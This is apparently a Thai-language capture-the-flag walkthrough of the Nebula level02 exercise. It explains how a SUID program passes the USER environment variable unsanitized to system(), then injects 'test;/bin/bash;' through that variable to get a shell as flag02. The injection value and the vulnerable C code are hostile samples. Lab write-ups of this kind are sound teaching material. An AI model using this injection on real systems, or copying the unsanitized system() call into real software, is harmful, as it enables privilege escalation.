How to inject command through the environmental variable – Nebula 02

บทนำ (Overview)

จากบทความที่แล้วเรากล่าวถึงตัวแปร “Environmental Variables” ที่ชื่อ “PATH” ไปแล้ว แต่เราจะพบว่าจริง ๆ แล้วยังมีอีกหลายตัว แต่โดยโครงสร้างของการกำหนดตัวแปรนั้น จะมีลักษณะดังนี้

KEY=value1:value2:...

เราสามารถตรวจสอบได้โดยใช้คำสั่ง “env”  หรือ “printenv” ตัวอย่างเช่น

level02@nebula:/home/flag02$ env 
TERM=xterm-256color
SHELL=/bin/sh
SSH_CLIENT=192.168.1.57 17386 22
SSH_TTY=/dev/pts/0
USER=level02
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:
MAIL=/var/mail/level02
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
PWD=/home/flag02
LANG=en_US.UTF-8
SHLVL=1
HOME=/home/level02
LANGUAGE=en_US:
LOGNAME=level02
SSH_CONNECTION=192.168.1.57 17386 192.168.1.47 22
LESSOPEN=| /usr/bin/lesspipe %s
LESSCLOSE=/usr/bin/lesspipe %s %s
_=/usr/bin/env
OLDPWD=/home

ขั้นตอน (Steps)

  1. ดาวน์โหลด “VM” ได้จาก https://exploit-exercises.com/download/
  2. “Login” โดยใช้ “User” คือ “level02” และ “Password” คือ “level02”
  3. โดยวัตถุประสงค์เราจะยกระดับสิทธิจาก “level02” เป็น “flag02”
  4. พบโปรแกรมคือ “/home/flag02 โดยใช้คำสั่งดังนี้
    ssh level02@192.168.1.47
    level02@nebula:/home/flag02$ ls -l
    total 8
    -rwsr-x--- 1 flag02 level02 7438 2011-11-20 21:22 flag02
    level02@nebula:/home/flag02$ ./flag02
    about to call system("/bin/echo level02 is cool")
    level02 is cool
    
  5. จากโจทย์โปรแกรมดังกล่าวมี “Source-code” โดยให้ค้นหาว่าช่องโหว่ดังกล่าวคือ สามารถตรวจสอบรายละเอียดของโจทย์ ได้จาก https://exploit-exercises.com/nebula/level02/
    int main(int argc, char **argv, char **envp)
    {
      char *buffer;
    
      gid_t gid;
      uid_t uid;
    
      gid = getegid();
      uid = geteuid();
    
      setresgid(gid, gid, gid);
      setresuid(uid, uid, uid);
    
      buffer = NULL;
    
      asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
      printf("about to call system(\"%s\")\n", buffer);
      
      system(buffer);
    }
    
    
  6. จากโจทย์กล่าวว่า โปรแกรมข้างต้นมีช่องโหว่ ที่จะสามารถ “Run” คำสั่งอื่น ๆ (หรือโปรแกรมต่าง  ๆ) นอกเหนือจากโปรแกรมที่เขียนไว้ได้ โดยสามารถได้สิทธิตามเจ้าของไฟล์ เนื่องจากมีการตั้ง “SUID” ให้กับไฟล์ดังกล่าว สามารถติดตามได้จากบทความ How to find SUID permission – Nebula 00
  7. มาตรวจสอบ “Source-code” ดูจะพบว่า
    asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
    
    1. ดึงข้อมูลจากตัวแปร “USER” ที่เป็น “Environmental Variables” นั้นก็คือ
      USER=level02
      
    2. โดยที่ค่าอ่านจากตัวแปร “Environment Variables” จะถูกนำไปรวมกับ %s จะได้เป็นข้อความดังนี้
      /bin/echo level02 is cool
      
    3. จาก “Source-code” จะพบว่ามีการสร้างตัวแปรชื่อ  “buffer” ซึ่งเป็นตัวแปรประเภท pointer (8) ให้มีความสามารถจัดเก็บข้อมูลประเภท “Char” หรือตัวอักษรได้
      char *buffer
      
    4. กำหนดค่าอักขระตามข้อ (2)  แล้วตั้งค่า “pointer” จากตัวแปรดังกล่าวให้มีขนาดเพียงพอรองรับอักขระที่เราใส่เข้าไปโดยใช้ฟังก์ชัน
      asprintf(&buffer, "char....");
      
  8. ในส่วนสุดท้ายจะพบว่าข้อมูลในตัวแปร “buffer” จะถูกนำมาประมวลผลโดยใช้คำสั่ง “system” ซึ่งก็คือ /bin/echo
    system(buffer);
    
  9. ที่นี้ลองกลับมาที่ตัวแปร “Environment Variables”  ถ้าเราเปลี่ยนค่าเป็นคำสั่งอื่น ๆ จะเกิดอะไรขึ้น เราสามารถเปลี่ยนค่าในตัวแปรดังกล่าวโดยใช้คำสั่งดังนี้
    /usr/bin/env USER="test;/bin/bash;" /home/flag02/flag02
    
  10. จากตัวอย่างข้างต้นเราลองเปลี่ยนตัวแปร “USER” โดยใช้คำสั่ง “/use/bin/env” โดยให้เป็นข้อความดังนี้ test;/bin/bash
    TERM=xterm-256color
    SHELL=/bin/sh
    SSH_CLIENT=192.168.1.47 3289 22
    SSH_TTY=/dev/pts/0
    USER=test;/bin/bash;
    LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:
    MAIL=/var/mail/level02
    PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
    PWD=/home/flag02
    LANG=en_US.UTF-8
    SHLVL=1
    HOME=/home/level02
    LANGUAGE=en_US:
    LOGNAME=level02
    SSH_CONNECTION=192.168.1.47 3289 192.168.1.54 22
    LESSOPEN=| /usr/bin/lesspipe %s
    LESSCLOSE=/usr/bin/lesspipe %s %s
    _=/usr/bin/env
    OLDPWD=/home
    
    
  11. ผลลัพธ์จากการ “Run” คำสั่งจะเป็นดังนี้
    about to call system("/bin/echo test;/bin/bash; is cool")
    test
    
  12. โปรแกรมจะ “echo” เพื่อแสดงผลคำว่า “test” และจบสิ้นคำสั่งเมื่อพบคำสั่ง “;” จากนั้นจะทำคำสั่งต่อไปคือ “/bin/bash”
  13. ตรวจสอบ “id” จะพบว่าเป็น “flag02”
    flag02@nebula:/home/flag02$ id
    uid=997(flag02) gid=1003(level02) groups=997(flag02),1003(level02)
    flag02@nebula:/home/flag02$ getflag
    You have successfully executed getflag on a target account
    

 

ใส่ความเห็น